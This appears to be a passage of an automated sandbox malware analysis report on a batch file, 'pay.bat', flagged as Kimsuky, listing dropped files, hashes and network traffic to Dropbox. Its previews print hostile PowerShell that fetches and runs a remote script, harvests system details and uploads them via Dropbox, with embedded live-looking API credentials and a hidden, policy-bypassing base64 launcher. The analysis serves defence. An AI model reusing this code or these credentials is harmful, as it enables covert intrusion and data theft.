                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kfgxgl0e.h3d.psm1

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mzfmpfwu.od1.psm1

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wb0oqvof.0lp.ps1

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                          C:\Users\user\AppData\Roaming\192.168.2.4-1127_0234-RRR-santa2.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):49412
                                                                                                                          Entropy (8bit):2.285655614929122
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:0po7vWIl+iABdGcQ+UnXCVcZjz9b65jJvd6FHi8kHZiSGQMUsoDbq4vV:0psWLiA7GcQ+UXC2Qd/soDbq49
                                                                                                                          MD5:BA66C392B130D13BA2D0E0D80C8BE955
                                                                                                                          SHA1:5C69EB22FDDD26149A3FE33D5E6B18D960765477
                                                                                                                          SHA-256:A3A294AA7D83CC1B8C1BEC9EE38EBA5ABA5FC29810196DDFBAA928E3DC20742A
                                                                                                                          SHA-512:1CD20FB36FA5723009D9D43C7FB978A8E66C7AE4D4ABD36ABFFFC7C6DC051579AA4F7F37FFCAC4CB9F7C128CC02FC791C5491F72FD672384475266DE952ACBEA
                                                                                                                          Malicious:false
                                                                                                                          Preview:......S.u.n.d.a.y.,. .S.e.p.t.e.m.b.e.r. .2.4.,. .2.0.2.3. .8.:.0.0.:.0.3. .A.M.................C.a.p.t.i.o.n. . . . . . . . . . . . . . . . . . .V.e.r.s.i.o.n. . . . .B.u.i.l.d.N.u.m.b.e.r. .O.S.A.r.c.h.i.t.e.c.t.u.r.e.....-.-.-.-.-.-.-. . . . . . . . . . . . . . . . . . .-.-.-.-.-.-.-. . . . .-.-.-.-.-.-.-.-.-.-.-. .-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.i.c.r.o.s.o.f.t. .W.i.n.d.o.w.s. .1.0. .P.r.o. .1.0...0...1.9.0.4.5. .1.9.0.4.5. . . . . . . .6.4.-.b.i.t. . . . . . . . .....................D.o.m.a.i.n. . . . . . . . . . . . . . .:. .X.B.r.l.w.....M.a.n.u.f.a.c.t.u.r.e.r. . . . . . . . .:. .m.P.P.z.R.h.Z.z.f.r.P.P.s.e.h.....M.o.d.e.l. . . . . . . . . . . . . . . .:. .o.S.Y. .t.1.T.2.....N.a.m.e. . . . . . . . . . . . . . . . .:. .J.O.N.E.S.-.P.C.....P.r.i.m.a.r.y.O.w.n.e.r.N.a.m.e. . . . .:. .h.a.r.d.z.....T.o.t.a.l.P.h.y.s.i.c.a.l.M.e.m.o.r.y. .:. .4.2.9.3.9.7.1.9.6.8.................D.e.s.k.....W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.....2.0.2.3.1.0.0.3.0.9.5.7.1.8...0.0.0.0.0.0.+.0.6.0.....

                                                                                                                          C:\Users\user\AppData\Roaming\192.168.2.4-1127_0234-XXX-santa2.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):14
                                                                                                                          Entropy (8bit):2.699513850319966
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:QdLTlil:Qh0
                                                                                                                          MD5:3D8CB1C7FD8A50C3ED6CB72ADCD719C4
                                                                                                                          SHA1:3ADE5C433A3AC215C8F613D983D1FB6616A9F5F6
                                                                                                                          SHA-256:CF1F286FF279CF983EBFA07381CAA7206D561D864A8C863050159E2DDF29A95F
                                                                                                                          SHA-512:1928304B53AB8EEDF7BEC699AABE01799353E7F693C3891A7A52A5FB0226C9006A329389072F297565A6B76ACFF523C9B2832A0B2285862C7564F9FC7098545C
                                                                                                                          Malicious:false
                                                                                                                          Preview:..x.m.i.l.....

                                                                                                                          C:\Users\user\AppData\Roaming\chrome.ps1

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):239
                                                                                                                          Entropy (8bit):5.322976015897835
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:jmWZighVTVcINFGYwXPPveU1vtel57BVO:SeRhVhRFGYw3WU1UTO
                                                                                                                          MD5:79EBFBF4D4F200563FE4700F3DF89A8C
                                                                                                                          SHA1:07224226E4DFBA4C7E4ED7FBCDF7BDC866BE4C91
                                                                                                                          SHA-256:F8EF63C2D7067BECC210638B175EB513501EABD21E36F79536FACA9B93A2C3A1
                                                                                                                          SHA-512:9095A82A1022CA0982C16030B7E2F4AEEAD0930EA6A5449BDCA698B9FACBBDC478E60B80BCF19231DDBB960FCFA9C5A4429F2D06535536D0AA7109CF16E39CB0
                                                                                                                          Malicious:false
                                                                                                                          Preview:.$aaa = Join-Path ($env:AppData) "temp.ps1"; wget -Uri "https://dl.dropboxusercontent.com/scl/fi/dkuamlrlsrbygso1swn8p/santa2-f.txt?rlkey=r8fe0viier1mwv9azk5awy5s9&st=yvqqfdfy&dl=0" -OutFile $aaa; & $aaa; Remove-Item -Path $aaa -Force;..

                                                                                                                          C:\Users\user\AppData\Roaming\system_first.ps1

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1532
                                                                                                                          Entropy (8bit):5.325750061933784
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:wgAyHnImia7udCYklujz3dXcbbA7xGtP7Uq6Pa7r7qLsHxXe1NruNKOfvIPysYQ9:QYnIF5dCYkAjzNxlsU9aX7CKxXe1I9vk
                                                                                                                          MD5:E598DB51DDEE48B7C351B68AEBF76EBF
                                                                                                                          SHA1:60CDEDB45513069A5D67310529966681BD0B4663
                                                                                                                          SHA-256:ED55BB081D0E4DFEEFD7AF35DBB0A0481BE192D3D0759631C951F7D6D5737749
                                                                                                                          SHA-512:3F513C736DF8D91529AA9C6BF52846B2CF985922D2FF1E7C6CF7759CBC27942FB0A20093C2483A1087890D23EC368CE3AAC0C2AAED3A57A621266BE7CC5BE7EB
                                                                                                                          Malicious:true
                                                                                                                          Yara Hits:
                                                                                                                          • Rule: JoeSecurity_Kimsuky_9, Description: Yara detected Kimsuky, Source: C:\Users\user\AppData\Roaming\system_first.ps1, Author: Joe Security
                                                                                                                          Preview:$ttttttttttttttttttttttpppppppppppppppppppp = $env:AppData;....$tokenRequestParams = @{.. grant_type = "refresh_token".. refresh_token = "CxR76FAp2JAAAAAAAAAAAYc-Z6EEUm1sCkInZnCsHRQKCp5lOSKBMipCEudngc-l";.. client_id = "8azqsrgxsd8fwrg".. client_secret = "jjaqv85bmknr7st"..}..$qwa = "https://a" + "pi.dr" + "opboxa" + "pi.com/oau" + "th2/to" + "ken"..$myttto = Invoke-RestMethod -Uri $qwa -Method Post -Body $tokenRequestParams......$ipAddress = (Get-WmiObject Win32_NetworkAdapterConfiguration | Where-Object { $_.IPAddress -ne $null }).IPAddress[0]..$currentTime = Get-Date -Format "MMdd_HHmm"....$fileName = "$ipAddress-$currentTime-XXX-santa2.txt"....$srcPath = Join-Path $ttttttttttttttttttttttpppppppppppppppppppp $fileName...."xmil" | Out-File -FilePath $srcPath......$outputFile = Split-Path $srcPath -leaf..$tttttffffppp="/githut/santa2_persist/$outputFile"..$arg = '{ "path": "' + $tttttffffppp + '", "mode": "add", "autorename": true, "mute": false }'..$authorization

                                                                                                                          C:\Users\user\AppData\Roaming\temp.ps1

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2318
                                                                                                                          Entropy (8bit):5.321570825661366
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:/YnIF5dCYkAjzNxlsL9taD9EDM9amaDWGa5iaL+iawsa9da27CEXe1I9vm8EZ:wnIF5dCYkAnmL9taD9DamaDWGakaLJaT
                                                                                                                          MD5:53029E897CBE2F8BBFEE935EB4C7AFD5
                                                                                                                          SHA1:491A79439625737B02B0471BF32E750EB8907469
                                                                                                                          SHA-256:F9260AE2FB93C9E1FD6A08EE65641F34B059026700DF953796ADDEFD37DC3969
                                                                                                                          SHA-512:2298D9F2AFBE807BECE37C20BD81F695B37567969CAA75343D7C3D3F5AB2A6A30789399767944443193A4E291FE36D6815D95E340DC8ADCE35B01C3594262F22
                                                                                                                          Malicious:true
                                                                                                                          Yara Hits:
                                                                                                                          • Rule: JoeSecurity_Kimsuky_9, Description: Yara detected Kimsuky, Source: C:\Users\user\AppData\Roaming\temp.ps1, Author: Joe Security
                                                                                                                          Preview:..$ttttttttttttttttttttttpppppppppppppppppppp = $env:AppData;....$tokenRequestParams = @{.. grant_type = "refresh_token".. refresh_token = "CxR76FAp2JAAAAAAAAAAAYc-Z6EEUm1sCkInZnCsHRQKCp5lOSKBMipCEudngc-l";.. client_id = "8azqsrgxsd8fwrg".. client_secret = "jjaqv85bmknr7st"..}..$qwa = "https://a" + "pi.dr" + "opboxa" + "pi.com/oau" + "th2/to" + "ken"..$myttto = Invoke-RestMethod -Uri $qwa -Method Post -Body $tokenRequestParams......$ipAddress = (Get-WmiObject Win32_NetworkAdapterConfiguration | Where-Object { $_.IPAddress -ne $null }).IPAddress[0]..$currentTime = Get-Date -Format "MMdd_HHmm"..$fileName = "$ipAddress-$currentTime-RRR-santa2.txt"..$srcPath = Join-Path $ttttttttttttttttttttttpppppppppppppppppppp $fileName..(Get-CimInstance Win32_OperatingSystem).LastBootUpTime | Out-File -FilePath $srcPath..(Get-CimInstance Win32_OperatingSystem | Select-Object Caption, Version, BuildNumber, OSArchitecture) | Out-File -FilePath $srcPath -Append.. Get-WmiObject -Class W

                                                                                                                          Static File Info

                                                                                                                          General

                                                                                                                          File type:DOS batch file, ASCII text, with very long lines (1674), with CRLF line terminators
                                                                                                                          Entropy (8bit):5.928714451182084
                                                                                                                          TrID:
                                                                                                                            File name:pay.bat
                                                                                                                            File size:1'687 bytes
                                                                                                                            MD5:b262ac518c0114f414aaedbb4ef7c728
                                                                                                                            SHA1:fd02470c6cc4ceb5fad3589d02e5148a8c738b83
                                                                                                                            SHA256:8e0eb0d36bfd4e28ec6a10acccf899740df7048451229b84715e475e3c91347b
                                                                                                                            SHA512:52da05952a4749d42cbcea8eac97d897ecb7e98cc0c7ce686fa86194b312de8d1f9c64580b3a8deb0cf5c7953651927d7a26bfbcbaa8db825cdda9f3a1507e21
                                                                                                                            SSDEEP:48:sLH6+590/x5NtibxMDIKQ858Ff92B6sNY1cOU:A0/Wx0ZQ858FRfcL
                                                                                                                            TLSH:3531B84856FA33159DA7DC917254C696232630B6147B1EACC347E5F45FC0135F0697CB
                                                                                                                            File Content Preview:@echo off..powershell/W 1 -ep bypass -w hidden -command $cmkGnaBV=[Convert]::FromBase64String('JHBwcCA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAiY2hyb21lLnBzMSI7ICRzdHIgPSAnJGFhYSA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAidGVtcC5wczEiOyB3Z2V0IC1VcmkgImh0dHBzOi8vZGwu

                                                                                                                            File Icon

                                                                                                                            Icon Hash:9686878b929a9886

                                                                                                                            Network Behavior

                                                                                                                            Network Port Distribution

                                                                                                                            TCP Packets

                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                            Nov 27, 2024 08:29:02.633502007 CET49730443192.168.2.4162.125.65.15
                                                                                                                            Nov 27, 2024 08:29:02.633568048 CET44349730162.125.65.15192.168.2.4
                                                                                                                            Nov 27, 2024 08:29:02.637326956 CET49730443192.168.2.4162.125.65.15
                                                                                                                            Nov 27, 2024 08:29:02.661356926 CET49730443192.168.2.4162.125.65.15
                                                                                                                            Nov 27, 2024 08:29:02.661387920 CET44349730162.125.65.15192.168.2.4
                                                                                                                            Nov 27, 2024 08:29:03.680998087 CET49731443192.168.2.4162.125.65.15
                                                                                                                            Nov 27, 2024 08:29:03.681057930 CET44349731162.125.65.15192.168.2.4
                                                                                                                            Nov 27, 2024 08:29:03.681122065 CET49731443192.168.2.4162.125.65.15
                                                                                                                            Nov 27, 2024 08:29:03.684632063 CET49731443192.168.2.4162.125.65.15
                                                                                                                            Nov 27, 2024 08:29:03.684650898 CET44349731162.125.65.15192.168.2.4
                                                                                                                            Nov 27, 2024 08:29:04.028240919 CET44349730162.125.65.15192.168.2.4
                                                                                                                            Nov 27, 2024 08:29:04.028316975 CET49730443192.168.2.4162.125.65.15
                                                                                                                            Nov 27, 2024 08:29:04.028352022 CET44349730162.125.65.15192.168.2.4
                                                                                                                            Nov 27, 2024 08:29:04.028389931 CET49730443192.168.2.4162.125.65.15
                                                                                                                            Nov 27, 2024 08:29:04.033493042 CET49730443192.168.2.4162.125.65.15
                                                                                                                            Nov 27, 2024 08:29:04.033504009 CET44349730162.125.65.15192.168.2.4
                                                                                                                            Nov 27, 2024 08:29:04.033781052 CET44349730162.125.65.15192.168.2.4
                                                                                                                            Nov 27, 2024 08:29:04.045469999 CET49730443192.168.2.4162.125.65.15
                                                                                                                            Nov 27, 2024 08:29:04.087347984 CET44349730162.125.65.15192.168.2.4
                                                                                                                            Nov 27, 2024 08:29:05.046049118 CET44349731162.125.65.15192.168.2.4
                                                                                                                            Nov 27, 2024 08:29:05.049294949 CET49731443192.168.2.4162.125.65.15
                                                                                                                            Nov 27, 2024 08:29:05.049333096 CET44349731162.125.65.15192.168.2.4
                                                                                                                            Nov 27, 2024 08:29:05.057290077 CET49731443192.168.2.4162.125.65.15
                                                                                                                            Nov 27, 2024 08:29:05.116759062 CET49731443192.168.2.4162.125.65.15
                                                                                                                            Nov 27, 2024 08:29:05.116815090 CET44349731162.125.65.15192.168.2.4
                                                                                                                            Nov 27, 2024 08:29:05.117187977 CET44349731162.125.65.15192.168.2.4
                                                                                                                            Nov 27, 2024 08:29:05.161302090 CET49731443192.168.2.4162.125.65.15
                                                                                                                            Nov 27, 2024 08:29:05.229808092 CET44349730162.125.65.15192.168.2.4
                                                                                                                            Nov 27, 2024 08:29:05.229830027 CET44349730162.125.65.15192.168.2.4
                                                                                                                            Nov 27, 2024 08:29:05.229899883 CET49730443192.168.2.4162.125.65.15
                                                                                                                            Nov 27, 2024 08:29:05.229931116 CET44349730162.125.65.15192.168.2.4
                                                                                                                            Nov 27, 2024 08:29:05.229979038 CET44349730162.125.65.15192.168.2.4
                                                                                                                            Nov 27, 2024 08:29:05.230022907 CET49730443192.168.2.4162.125.65.15
                                                                                                                            Nov 27, 2024 08:29:05.274154902 CET49730443192.168.2.4162.125.65.15
                                                                                                                            Nov 27, 2024 08:29:05.352643013 CET49731443192.168.2.4162.125.65.15
                                                                                                                            Nov 27, 2024 08:29:05.395354986 CET44349731162.125.65.15192.168.2.4
                                                                                                                            Nov 27, 2024 08:29:05.753748894 CET49732443192.168.2.4162.125.69.19
                                                                                                                            Nov 27, 2024 08:29:05.753803968 CET44349732162.125.69.19192.168.2.4
                                                                                                                            Nov 27, 2024 08:29:05.753853083 CET49732443192.168.2.4162.125.69.19
                                                                                                                            Nov 27, 2024 08:29:05.755234957 CET49732443192.168.2.4162.125.69.19
                                                                                                                            Nov 27, 2024 08:29:05.755248070 CET44349732162.125.69.19192.168.2.4
                                                                                                                            Nov 27, 2024 08:29:06.235811949 CET44349731162.125.65.15192.168.2.4
                                                                                                                            Nov 27, 2024 08:29:06.235833883 CET44349731162.125.65.15192.168.2.4
                                                                                                                            Nov 27, 2024 08:29:06.236028910 CET49731443192.168.2.4162.125.65.15
                                                                                                                            Nov 27, 2024 08:29:06.236073971 CET44349731162.125.65.15192.168.2.4
                                                                                                                            Nov 27, 2024 08:29:06.236319065 CET44349731162.125.65.15192.168.2.4
                                                                                                                            Nov 27, 2024 08:29:06.236447096 CET49731443192.168.2.4162.125.65.15
                                                                                                                            Nov 27, 2024 08:29:06.245289087 CET49731443192.168.2.4162.125.65.15
                                                                                                                            Nov 27, 2024 08:29:06.280504942 CET49733443192.168.2.4162.125.69.19
                                                                                                                            Nov 27, 2024 08:29:06.280575037 CET44349733162.125.69.19192.168.2.4
                                                                                                                            Nov 27, 2024 08:29:06.280647039 CET49733443192.168.2.4162.125.69.19
                                                                                                                            Nov 27, 2024 08:29:06.281286001 CET49733443192.168.2.4162.125.69.19
                                                                                                                            Nov 27, 2024 08:29:06.281300068 CET44349733162.125.69.19192.168.2.4
                                                                                                                            Nov 27, 2024 08:29:07.224360943 CET44349732162.125.69.19192.168.2.4
                                                                                                                            Nov 27, 2024 08:29:07.224457026 CET49732443192.168.2.4162.125.69.19
                                                                                                                            Nov 27, 2024 08:29:07.225110054 CET44349732162.125.69.19192.168.2.4
                                                                                                                            Nov 27, 2024 08:29:07.225332975 CET49732443192.168.2.4162.125.69.19
                                                                                                                            Nov 27, 2024 08:29:07.227943897 CET49732443192.168.2.4162.125.69.19
                                                                                                                            Nov 27, 2024 08:29:07.227961063 CET44349732162.125.69.19192.168.2.4
                                                                                                                            Nov 27, 2024 08:29:07.228250027 CET44349732162.125.69.19192.168.2.4
                                                                                                                            Nov 27, 2024 08:29:07.229156017 CET49732443192.168.2.4162.125.69.19
                                                                                                                            Nov 27, 2024 08:29:07.271393061 CET44349732162.125.69.19192.168.2.4
                                                                                                                            Nov 27, 2024 08:29:07.271467924 CET49732443192.168.2.4162.125.69.19
                                                                                                                            Nov 27, 2024 08:29:07.271508932 CET44349732162.125.69.19192.168.2.4
                                                                                                                            Nov 27, 2024 08:29:07.742939949 CET44349733162.125.69.19192.168.2.4
                                                                                                                            Nov 27, 2024 08:29:07.743016958 CET49733443192.168.2.4162.125.69.19
                                                                                                                            Nov 27, 2024 08:29:07.743603945 CET44349733162.125.69.19192.168.2.4
                                                                                                                            Nov 27, 2024 08:29:07.745322943 CET49733443192.168.2.4162.125.69.19
                                                                                                                            Nov 27, 2024 08:29:07.746465921 CET49733443192.168.2.4162.125.69.19
                                                                                                                            Nov 27, 2024 08:29:07.746478081 CET44349733162.125.69.19192.168.2.4
                                                                                                                            Nov 27, 2024 08:29:07.746680021 CET44349733162.125.69.19192.168.2.4
                                                                                                                            Nov 27, 2024 08:29:07.747519016 CET49733443192.168.2.4162.125.69.19
                                                                                                                            Nov 27, 2024 08:29:07.795337915 CET44349733162.125.69.19192.168.2.4
                                                                                                                            Nov 27, 2024 08:29:07.795404911 CET49733443192.168.2.4162.125.69.19
                                                                                                                            Nov 27, 2024 08:29:07.795419931 CET44349733162.125.69.19192.168.2.4
                                                                                                                            Nov 27, 2024 08:29:07.977866888 CET44349732162.125.69.19192.168.2.4
                                                                                                                            Nov 27, 2024 08:29:07.977926016 CET44349732162.125.69.19192.168.2.4
                                                                                                                            Nov 27, 2024 08:29:07.978188038 CET49732443192.168.2.4162.125.69.19
                                                                                                                            Nov 27, 2024 08:29:07.978622913 CET49732443192.168.2.4162.125.69.19
                                                                                                                            Nov 27, 2024 08:29:08.499633074 CET44349733162.125.69.19192.168.2.4
                                                                                                                            Nov 27, 2024 08:29:08.499696016 CET44349733162.125.69.19192.168.2.4
                                                                                                                            Nov 27, 2024 08:29:08.499789953 CET49733443192.168.2.4162.125.69.19
                                                                                                                            Nov 27, 2024 08:29:08.500458002 CET49733443192.168.2.4162.125.69.19
                                                                                                                            Nov 27, 2024 08:29:08.635111094 CET49734443192.168.2.4162.125.69.14
                                                                                                                            Nov 27, 2024 08:29:08.635165930 CET44349734162.125.69.14192.168.2.4
                                                                                                                            Nov 27, 2024 08:29:08.635385036 CET49734443192.168.2.4162.125.69.14
                                                                                                                            Nov 27, 2024 08:29:08.654798031 CET49734443192.168.2.4162.125.69.14
                                                                                                                            Nov 27, 2024 08:29:08.654815912 CET44349734162.125.69.14192.168.2.4
                                                                                                                            Nov 27, 2024 08:29:09.401570082 CET49735443192.168.2.4162.125.69.14
                                                                                                                            Nov 27, 2024 08:29:09.401614904 CET44349735162.125.69.14192.168.2.4
                                                                                                                            Nov 27, 2024 08:29:09.401689053 CET49735443192.168.2.4162.125.69.14
                                                                                                                            Nov 27, 2024 08:29:09.466916084 CET49735443192.168.2.4162.125.69.14
                                                                                                                            Nov 27, 2024 08:29:09.466931105 CET44349735162.125.69.14192.168.2.4
                                                                                                                            Nov 27, 2024 08:29:10.171019077 CET44349734162.125.69.14192.168.2.4
                                                                                                                            Nov 27, 2024 08:29:10.171241045 CET49734443192.168.2.4162.125.69.14
                                                                                                                            Nov 27, 2024 08:29:10.173059940 CET49734443192.168.2.4162.125.69.14
                                                                                                                            Nov 27, 2024 08:29:10.173074007 CET44349734162.125.69.14192.168.2.4
                                                                                                                            Nov 27, 2024 08:29:10.173347950 CET44349734162.125.69.14192.168.2.4
                                                                                                                            Nov 27, 2024 08:29:10.174166918 CET49734443192.168.2.4162.125.69.14
                                                                                                                            Nov 27, 2024 08:29:10.215362072 CET44349734162.125.69.14192.168.2.4
                                                                                                                            Nov 27, 2024 08:29:10.217411041 CET49734443192.168.2.4162.125.69.14
                                                                                                                            Nov 27, 2024 08:29:10.217422009 CET44349734162.125.69.14192.168.2.4
                                                                                                                            Nov 27, 2024 08:29:10.884778976 CET44349735162.125.69.14192.168.2.4
                                                                                                                            Nov 27, 2024 08:29:10.885019064 CET49735443192.168.2.4162.125.69.14
                                                                                                                            Nov 27, 2024 08:29:10.886832952 CET49735443192.168.2.4162.125.69.14
                                                                                                                            Nov 27, 2024 08:29:10.886848927 CET44349735162.125.69.14192.168.2.4
                                                                                                                            Nov 27, 2024 08:29:10.887092113 CET44349735162.125.69.14192.168.2.4
                                                                                                                            Nov 27, 2024 08:29:10.888051987 CET49735443192.168.2.4162.125.69.14
                                                                                                                            Nov 27, 2024 08:29:10.888863087 CET49735443192.168.2.4162.125.69.14
                                                                                                                            Nov 27, 2024 08:29:10.888895035 CET44349735162.125.69.14192.168.2.4
                                                                                                                            Nov 27, 2024 08:29:10.889003038 CET49735443192.168.2.4162.125.69.14
                                                                                                                            Nov 27, 2024 08:29:10.889041901 CET44349735162.125.69.14192.168.2.4
                                                                                                                            Nov 27, 2024 08:29:10.889106035 CET49735443192.168.2.4162.125.69.14
                                                                                                                            Nov 27, 2024 08:29:10.889116049 CET44349735162.125.69.14192.168.2.4
                                                                                                                            Nov 27, 2024 08:29:11.519656897 CET44349734162.125.69.14192.168.2.4
                                                                                                                            Nov 27, 2024 08:29:11.519725084 CET44349734162.125.69.14192.168.2.4
                                                                                                                            Nov 27, 2024 08:29:11.519803047 CET49734443192.168.2.4162.125.69.14
                                                                                                                            Nov 27, 2024 08:29:11.520301104 CET49734443192.168.2.4162.125.69.14
                                                                                                                            Nov 27, 2024 08:29:12.574050903 CET44349735162.125.69.14192.168.2.4
                                                                                                                            Nov 27, 2024 08:29:12.574110985 CET44349735162.125.69.14192.168.2.4
                                                                                                                            Nov 27, 2024 08:29:12.574156046 CET49735443192.168.2.4162.125.69.14
                                                                                                                            Nov 27, 2024 08:29:12.574739933 CET49735443192.168.2.4162.125.69.14

                                                                                                                            UDP Packets

                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                            Nov 27, 2024 08:29:02.171025038 CET6454153192.168.2.41.1.1.1
                                                                                                                            Nov 27, 2024 08:29:02.557193995 CET53645411.1.1.1192.168.2.4
                                                                                                                            Nov 27, 2024 08:29:05.379278898 CET5379553192.168.2.41.1.1.1
                                                                                                                            Nov 27, 2024 08:29:05.752635002 CET53537951.1.1.1192.168.2.4
                                                                                                                            Nov 27, 2024 08:29:08.260850906 CET5688453192.168.2.41.1.1.1
                                                                                                                            Nov 27, 2024 08:29:08.634126902 CET53568841.1.1.1192.168.2.4

                                                                                                                            DNS Queries

                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                            Nov 27, 2024 08:29:02.171025038 CET192.168.2.41.1.1.10x8897Standard query (0)dl.dropboxusercontent.comA (IP address)IN (0x0001)false
                                                                                                                            Nov 27, 2024 08:29:05.379278898 CET192.168.2.41.1.1.10x78caStandard query (0)api.dropboxapi.comA (IP address)IN (0x0001)false
                                                                                                                            Nov 27, 2024 08:29:08.260850906 CET192.168.2.41.1.1.10xb5f9Standard query (0)content.dropboxapi.comA (IP address)IN (0x0001)false

                                                                                                                            DNS Answers

                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                            Nov 27, 2024 08:29:02.557193995 CET1.1.1.1192.168.2.40x8897No error (0)dl.dropboxusercontent.comedge-block-www-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Nov 27, 2024 08:29:02.557193995 CET1.1.1.1192.168.2.40x8897No error (0)edge-block-www-env.dropbox-dns.com162.125.65.15A (IP address)IN (0x0001)false
                                                                                                                            Nov 27, 2024 08:29:05.752635002 CET1.1.1.1192.168.2.40x78caNo error (0)api.dropboxapi.comapi.dropbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Nov 27, 2024 08:29:05.752635002 CET1.1.1.1192.168.2.40x78caNo error (0)api.dropbox.comapi-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Nov 27, 2024 08:29:05.752635002 CET1.1.1.1192.168.2.40x78caNo error (0)api-env.dropbox-dns.com162.125.69.19A (IP address)IN (0x0001)false
                                                                                                                            Nov 27, 2024 08:29:08.634126902 CET1.1.1.1192.168.2.40xb5f9No error (0)content.dropboxapi.comedge-block-api-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Nov 27, 2024 08:29:08.634126902 CET1.1.1.1192.168.2.40xb5f9No error (0)edge-block-api-env.dropbox-dns.com162.125.69.14A (IP address)IN (0x0001)false

                                                                                                                            HTTP Request Dependency Graph

                                                                                                                            • dl.dropboxusercontent.com
                                                                                                                            • api.dropboxapi.com
                                                                                                                            • content.dropboxapi.com

                                                                                                                            HTTPS Proxied Packets

                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            0192.168.2.449730162.125.65.154432124C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            TimestampBytes transferredDirectionData
